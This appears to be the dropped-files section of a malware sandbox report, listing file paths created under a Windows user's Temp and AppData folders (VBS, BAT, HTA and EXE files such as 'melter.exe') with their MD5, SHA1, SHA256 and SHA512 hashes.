SHA512 5f2fee37de012f090267c3ad1f4fa2ff5051aa4bf6c5a2a476a4b4e9b1272b16301d3c82d38f33732b767447de8da2ce967a26c1952048c1e8315c7d8e1bfbc1

C:\Users\Admin\AppData\Local\Temp\20725.vbs

MD5 8a9b451fd9936100f33b576bb5ec3f02
SHA1 80c92544f733ddfb96dffa296293fb2835e85f2e
SHA256 4e17707eab52e31f035b13f68cce1aa2636680abde9de955fdf1495641660455
SHA512 b11700e12cc1c921dbf3cd017595dbb18befdb5a89e80295aa99ef8d5d23d3e689bf6b011927da27cb88ac93feea8fcef822b4b7acd92c26b32d5791773e911f

C:\Users\Admin\AppData\Local\Temp\4235.vbs

MD5 523092d53a06f5b46778a0cd7c01d0fb
SHA1 221a8244271afdbe7ce105aaf189f1dbcfa57cdb
SHA256 09c2ca44b387ae9f69f0c001729c71313bae1d935ad99723a02ebfc0d2757c3e
SHA512 72015f1a996c56b6eab20590cdb2689124b87494a2ae8fb5fb0678dfb4bfd49046f66b23b0348a70942d74664e22051d5be5994de518414baa47ad81e77400eb

C:\Users\Admin\AppData\Local\Temp\salope.exe

MD5 a1ca4bebcd03fafbe2b06a46a694e29a
SHA1 ffc88125007c23ff6711147a12f9bba9c3d197ed
SHA256 c3fa59901d56ce8a95a303b22fd119cb94abf4f43c4f6d60a81fd78b7d00fa65
SHA512 6fe1730bf2a6bba058c5e1ef309a69079a6acca45c0dbca4e7d79c877257ac08e460af741459d1e335197cf4de209f2a2997816f2a2a3868b2c8d086ef789b0e

C:\Users\Admin\AppData\Local\Temp\9391.vbs

MD5 ed4068f59e84632317fe338a2892ecb1
SHA1 260ca0f384ec0784933794a7aed6fb0ac8aaec23
SHA256 24baf9de71f49028cf6188127dea430347bee63f553225dc93c97db83a4ffeaf
SHA512 93774b5f8e54c16cf65db696613201b88bf64847e8558b8171ec7351e9cdc133a28df6a9f3269add80b8a588761bf9b2c40015cdd5b3e068cee9d069b66be1c5

C:\Users\Admin\AppData\Local\Temp\14246.vbs

MD5 4148025b2c24c93fd1e7d85860e6b816
SHA1 0b5b79f0c4d44b0ebdb990ee6b662f835a07dd98
SHA256 3cb01880c6a02c5f8aad54ee9d5e6a3500777e20c4c07ea56fa267e16f3ad7e0
SHA512 bdf85f2a0581895a28b93dc7038b2d269bdc4a290b778fe3467834b5d8d203f340f41563cfc9c77e22f63a7646c5ce83861c94f687d2dbda06055163a6f8a943

C:\Users\Admin\AppData\Local\Temp\23948.vbs

MD5 27bf402bae00ba56abb7fce0eac5fe88
SHA1 7b17239cc71d9a3bd2a42307cc7059a2b2616ce7
SHA256 f54c91b6da58a43d45cd300670055e9569f7006a6428fd5e875b0c59feb0771d
SHA512 6cc36a79ed28cf292c4e6220ee026f3dc47779684600801d60424ca64a53cbff453e983f97559dc93927cccac94a23bf2c0f49cb826b047db9b409fe599c37ef

C:\Users\Admin\AppData\Local\Temp\26852.vbs

MD5 ec385d968eea8bf5abe4587305f39c89
SHA1 6509b0bb7cb6432a4c723f37dc7593116ad57c64
SHA256 98adff52d2e37335bc6fb9811a2759ab8bd86c6ca116818114a0ab88474a6f96
SHA512 d5ff6edac9fcc50a634ff949268004bc396a07bb472fce532166140964acbbb4195e99a02dae8a426e2c4f7a9c64a89d283361340615d89ef7465acbab5b26a8

C:\Users\Admin\AppData\Local\Temp\31845.vbs

MD5 1dbb89d3ca69d397acdc3b541bd64a44
SHA1 8b4701b28662019ac5e023e90e24df288681f4b6
SHA256 b7ff0828abf1aee9e3cde2edfc9e936c87f324f200a6f31af969e0e19608d6c4
SHA512 7e6a2ceccc21b81e5525a14303ed31d6056be4991a5e80ef8bbe2d968e26963268ad20fc4ed1e16037e8cd79bb2fdee556f15d2dc5a9f26017f8d92127faa1cd

C:\Users\Admin\AppData\Local\Temp\28089.bat

MD5 2be0daca40c0accdf8900515a304b2d9
SHA1 dbfd7fcb8b1285fe79bafa1d2fea0cb91369ae0d
SHA256 23129bf85a33c39d4f80c6ebf8aeb8fc752c697f5aa17209825ee64a87a0ffa0
SHA512 a6be01fc1e5e5858a360dfc548035cf0a06d33dd0ec0da1f0039fe7710f67113dbb0dbfe89eb1957172108add2692545a3a19ebe8320cdc0a0d2a93409b9fc3f

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.DTD

MD5 90be2701c8112bebc6bd58a7de19846e
SHA1 a95be407036982392e2e684fb9ff6602ecad6f1e
SHA256 644fbcdc20086e16d57f31c5bad98be68d02b1c061938d2f5f91cbe88c871fbf
SHA512 d618b473b68b48d746c912ac5fc06c73b047bd35a44a6efc7a859fe1162d68015cf69da41a5db504dcbc4928e360c095b32a3b7792fcc6a38072e1ebd12e7cbe

C:\Users\Admin\AppData\Local\Temp\risitas.hta

MD5 af25ddf889ed3804a85b487a95993a94
SHA1 e22ce7ce7e6b18400913de410be90fa79c2b6edb
SHA256 bfa65bf74a7c96fc8a0ffc527d2fb143d349059466d6248fe2c0d45212baa3ab
SHA512 8f5a9eef4daee35d9ff9e7a2f9c4ba92cc89a5443a9cf5e563dc23317a1546862b3b73be865ba1aa0e2668d5bee84d05fd66042171235a35347794ab6aa3297c

C:\Users\Admin\AppData\Local\Temp\melter.exe

MD5 d9baac374cc96e41c9f86c669e53f61c
SHA1 b0ba67bfac3d23e718b3bfdfe120e5446d0229e8
SHA256 a1d883577bcb6c4f9de47b06fe97c370c09bddffb6569b6cf93576371bdbc412
SHA512 4ecdf8757e75b02da06a9d42a8ca62b9f2ef292dc04fa37d96603af78433f8aa9dd82fcf1e128a8f463b9691dcc1645b4a64e34f3c5d631f3a0e0670da0d0457

\??\PIPE\lsarpc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 48e64826caf62774420deff568a1963c
SHA1 f058d03975cb2301a6cf5ba2e100861788bb128d
SHA256 c9c6cc0a1cc828386fcc1f4780909d26e7d4659b13f0d29660b3e8d2870c7b93
SHA512 7815d74a162e69bfe042a0b056d77bcd0c1406e8f45a2a67a748f8c6f6982ce286b849594ec6369438952073b551023259b296ee299b7b95d272473fc86f88d9

C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_A252AE74B42D4524ACB318EAE2BE4DE9.dat

MD5 08b5d76d42c7dd68551f85fbdb3a27e5
SHA1 ebd592af371840f90386b52a899fa87c2dbaa9f3
SHA256 c4e105ab6e498efe645038276e7cdeb9bddeb06041c92caa85c16f357a0c29b6
SHA512 3812c8683c8455160a6d3cd1532c708c8036eceb818c3f6bd91925dc4e54f89bd4e0c3aa238f2351560408a4e9c1d5fb9ca2e96c0c725cc20814c23450535a8a